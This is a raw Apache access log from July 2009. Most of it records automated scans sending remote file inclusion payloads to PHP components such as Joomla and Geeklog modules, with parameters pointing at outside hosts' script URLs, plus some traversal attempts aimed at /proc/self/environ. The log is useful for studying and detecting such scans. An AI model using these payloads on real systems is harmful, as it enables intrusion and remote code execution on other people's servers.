66.249.68.70 - - [13/Jul/2009:01:14:23 -0400] "GET /images/ACE_EZ_PRP_sellsheet.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.58.155.223 - - [13/Jul/2009:01:15:15 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://5euroshirts.com/1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:15:15 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://5euroshirts.com/1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:15:15 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://5euroshirts.com/1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:15:15 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://5euroshirts.com/1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:01:15:37 -0400] "GET /logs/access_log.Q109063000/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:01:15:37 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:01:15:37 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
68.109.233.157 - - [13/Jul/2009:01:15:51 -0400] "GET /logs/access_log.Q109070800////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.59.12.99 - - [13/Jul/2009:01:16:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.229.45.106 - - [13/Jul/2009:01:16:32 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://digitalflutterby.com/read/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.229.45.106 - - [13/Jul/2009:01:16:32 -0400] "GET /logs/error_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://digitalflutterby.com/read/fx29id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
72.30.78.243 - - [13/Jul/2009:01:17:28 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.58.155.223 - - [13/Jul/2009:01:17:48 -0400] "GET /logs/access_log.Q109060100%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://5euroshirts.com/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:17:48 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://5euroshirts.com/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.18.107.20 - - [13/Jul/2009:01:17:50 -0400] "GET /logs/access_log.Q109060700/bemarket/postscript/postscript.php?p_mode=http://www.die-grenzreiter.com/content/download/pw.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.65"
207.210.89.18 - - [13/Jul/2009:01:19:08 -0400] "GET /logs/access_log.Q109062200//default.php?page=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 237 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
207.210.89.18 - - [13/Jul/2009:01:19:08 -0400] "GET //default.php?page=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 210 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
207.210.89.18 - - [13/Jul/2009:01:19:08 -0400] "GET /logs//default.php?page=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 215 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
207.210.89.18 - - [13/Jul/2009:01:19:08 -0400] "GET /logs/access_log.Q109062200/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 235 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
207.210.89.18 - - [13/Jul/2009:01:19:08 -0400] "GET /errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 208 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
207.210.89.18 - - [13/Jul/2009:01:19:08 -0400] "GET /logs/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 213 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
207.210.89.18 - - [13/Jul/2009:01:19:08 -0400] "GET /logs/access_log.Q109062200//default.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 237 "-" "XXXXXX"
207.210.89.18 - - [13/Jul/2009:01:19:08 -0400] "GET //default.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 210 "-" "XXXXXX"
207.210.89.18 - - [13/Jul/2009:01:19:08 -0400] "GET /logs//default.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 215 "-" "XXXXXX"
207.210.89.18 - - [13/Jul/2009:01:19:08 -0400] "GET /logs/access_log.Q109062200//default.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 237 "-" "XXXXXX"
207.210.89.18 - - [13/Jul/2009:01:19:08 -0400] "GET //default.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 210 "-" "XXXXXX"
207.210.89.18 - - [13/Jul/2009:01:19:08 -0400] "GET /logs//default.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 215 "-" "XXXXXX"
209.18.107.20 - - [13/Jul/2009:01:19:46 -0400] "GET /logs/access_log.Q109060600/bemarket/postscript/postscript.php?p_mode=http://www.die-grenzreiter.com/content/download/pw.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.65"
207.58.155.223 - - [13/Jul/2009:01:20:13 -0400] "GET /convert/mvcw.php?vwar_root=http://5euroshirts.com/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:20:13 -0400] "GET /logs/access_log.Q109061100%20%20/convert/mvcw.php?vwar_root=http://5euroshirts.com/1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:20:13 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://5euroshirts.com/1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:01:20:29 -0400] "GET /logs/access_log.Q109060100/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:20:31 -0400] "GET /logs/access_log.Q109062100%20%20/convert/mvcw.php?vwar_root=http://5euroshirts.com/1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:01:21:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
194.183.86.220 - - [13/Jul/2009:01:23:24 -0400] "GET /logs/access_log.Q109060700/bemarket/postscript/postscript.php?p_mode=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:01:26:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
86.35.0.115 - - [13/Jul/2009:01:26:58 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
86.35.0.115 - - [13/Jul/2009:01:26:58 -0400] "GET /?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
86.35.0.115 - - [13/Jul/2009:01:26:58 -0400] "GET /logs/?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 200 9324 "-" "libwww-perl/5.810"
89.234.63.107 - - [13/Jul/2009:01:27:22 -0400] "GET /logs/access_log.Q109050700//admin/classes/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.234.63.107 - - [13/Jul/2009:01:27:22 -0400] "GET //admin/classes/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.234.63.107 - - [13/Jul/2009:01:27:22 -0400] "GET /logs//admin/classes/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.234.63.107 - - [13/Jul/2009:01:27:23 -0400] "GET //admin/classes/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.234.63.107 - - [13/Jul/2009:01:27:23 -0400] "GET /logs//admin/classes/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.234.63.107 - - [13/Jul/2009:01:27:23 -0400] "GET /logs/access_log.Q109050700//admin/classes/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.35.0.115 - - [13/Jul/2009:01:27:32 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
207.58.155.223 - - [13/Jul/2009:01:28:50 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?vwar_root=http://5euroshirts.com/1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:29:06 -0400] "GET //newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:29:06 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:29:06 -0400] "GET /logs//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:29:08 -0400] "GET //newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:29:08 -0400] "GET /logs//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:29:09 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:29:14 -0400] "GET /logs/access_log.Q109062100/convert/mvcw.php?vwar_root=http://5euroshirts.com/1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:29:22 -0400] "GET //newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:29:24 -0400] "GET /logs//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:29:24 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
89.234.63.107 - - [13/Jul/2009:01:30:31 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:30:48 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:30:56 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:01:31:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.234.63.107 - - [13/Jul/2009:01:31:05 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:31:12 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:31:13 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
65.55.105.231 - - [13/Jul/2009:01:31:13 -0400] "GET /logs/access_log.Q108122500 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
70.87.64.234 - - [13/Jul/2009:01:31:16 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:31:19 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:32:56 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/index.php?basepath=http://5euroshirts.com/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:32:56 -0400] "GET //modules/My_eGallery/index.php?basepath=http://5euroshirts.com/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:32:56 -0400] "GET /logs//modules/My_eGallery/index.php?basepath=http://5euroshirts.com/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:32:56 -0400] "GET /logs/access_log.Q109061700//modules/My_eGallery/index.php?basepath=http://5euroshirts.com/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:01:33:50 -0400] "GET //searcharrays.php?addonDir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:01:33:50 -0400] "GET /logs//searcharrays.php?addonDir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:01:33:51 -0400] "GET /logs/access_log.Q109070200%20%20//searcharrays.php?addonDir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:33:59 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:34:14 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.249.68.70 - - [13/Jul/2009:01:34:19 -0400] "GET /images/items/04948701_full.jpg HTTP/1.1" 200 10990 "-" "Googlebot-Image/1.0"
207.210.89.18 - - [13/Jul/2009:01:35:00 -0400] "GET /logs/error_log.Q109062200//default.php?page=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
207.210.89.18 - - [13/Jul/2009:01:35:00 -0400] "GET /logs/error_log.Q109062200/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
207.210.89.18 - - [13/Jul/2009:01:35:00 -0400] "GET /logs/error_log.Q109062200//default.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 236 "-" "XXXXXX"
207.210.89.18 - - [13/Jul/2009:01:35:00 -0400] "GET /logs/error_log.Q109062200//default.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "XXXXXX"
207.58.155.223 - - [13/Jul/2009:01:35:23 -0400] "GET /logs/access_log.Q109052100%20%20//modules/My_eGallery/index.php?basepath=http://5euroshirts.com/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:01:35:27 -0400] "GET /logs/access_log.Q109061700%20%20//modules/My_eGallery/index.php?basepath=http://5euroshirts.com/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:01:36:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.133.150.130 - - [13/Jul/2009:01:39:25 -0400] "GET //?path%5Bdocroot%5D=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.820"
59.22.140.17 - - [13/Jul/2009:01:40:36 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:01:40:36 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:01:41:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.174.82.220 - - [13/Jul/2009:01:45:19 -0400] "GET /logs/access_log.Q109061500%20/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 309 "-" "libwww-perl/5.79"
202.174.82.220 - - [13/Jul/2009:01:45:19 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
202.174.82.220 - - [13/Jul/2009:01:45:20 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
209.59.12.99 - - [13/Jul/2009:01:46:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.133.150.130 - - [13/Jul/2009:01:48:57 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:01:48:57 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:01:48:57 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:01:49:22 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
209.59.12.99 - - [13/Jul/2009:01:51:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.139.92.9 - - [13/Jul/2009:01:51:25 -0400] "GET /logs/access_log.Q109062100/components/com_rwcards/captcha/captcha_image.php?img=http://www.x-pronet.com/board/safe1.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.823"
209.139.92.9 - - [13/Jul/2009:01:51:26 -0400] "GET /components/com_rwcards/captcha/captcha_image.php?img=http://www.x-pronet.com/board/safe1.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.823"
209.139.92.9 - - [13/Jul/2009:01:51:26 -0400] "GET /logs/components/com_rwcards/captcha/captcha_image.php?img=http://www.x-pronet.com/board/safe1.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.823"
86.35.0.115 - - [13/Jul/2009:01:51:46 -0400] "GET /?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
174.133.150.130 - - [13/Jul/2009:01:53:30 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.centralfilms.net/cgi/bots/response.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:01:53:30 -0400] "GET //?path%5Bdocroot%5D=http://www.centralfilms.net/cgi/bots/response.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:01:53:30 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.centralfilms.net/cgi/bots/response.txt??? HTTP/1.1" 200 9329 "-" "libwww-perl/5.820"
202.174.82.220 - - [13/Jul/2009:01:53:49 -0400] "GET /logs/access_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 308 "-" "libwww-perl/5.79"
202.174.82.220 - - [13/Jul/2009:01:53:50 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
202.174.82.220 - - [13/Jul/2009:01:53:51 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
174.133.150.130 - - [13/Jul/2009:01:53:54 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.centralfilms.net/cgi/bots/response.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.820"
209.139.92.9 - - [13/Jul/2009:01:53:58 -0400] "GET /logs/error_log.Q109070500/components/com_rwcards/captcha/captcha_image.php?img=http://www.x-pronet.com/board/safe1.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.823"
202.174.82.220 - - [13/Jul/2009:01:54:52 -0400] "GET /logs/access_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 308 "-" "libwww-perl/5.79"
202.174.82.220 - - [13/Jul/2009:01:54:58 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
202.174.82.220 - - [13/Jul/2009:01:54:59 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
174.133.150.130 - - [13/Jul/2009:01:55:11 -0400] "GET /logs/access_log.Q109060900/_SERVER[DOCUMENT_ROOT]=http://www.centralfilms.net/cgi/bots/response.txt??? HTTP/1.1" 404 297 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:01:55:11 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://www.centralfilms.net/cgi/bots/response.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:01:55:11 -0400] "GET /logs/_SERVER[DOCUMENT_ROOT]=http://www.centralfilms.net/cgi/bots/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820"
212.158.167.98 - - [13/Jul/2009:01:55:53 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
209.59.12.99 - - [13/Jul/2009:01:56:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.158.167.98 - - [13/Jul/2009:01:56:07 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
212.158.167.98 - - [13/Jul/2009:01:56:07 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
212.158.167.98 - - [13/Jul/2009:01:56:08 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
174.133.150.130 - - [13/Jul/2009:01:56:18 -0400] "GET /logs/access_log.Q109060900/_SERVER[DOCUMENT_ROOT]=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 297 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:01:56:18 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:01:56:18 -0400] "GET /logs/_SERVER[DOCUMENT_ROOT]=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820"
202.174.82.220 - - [13/Jul/2009:01:56:24 -0400] "GET /logs/error_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
212.158.167.98 - - [13/Jul/2009:01:56:27 -0400] "GET /logs/access_log.Q109062200//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
212.158.167.98 - - [13/Jul/2009:01:56:27 -0400] "GET //com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
212.158.167.98 - - [13/Jul/2009:01:56:27 -0400] "GET /logs//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
174.133.150.130 - - [13/Jul/2009:01:56:33 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
212.158.167.98 - - [13/Jul/2009:01:56:44 -0400] "GET /logs/access_log.Q109070800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
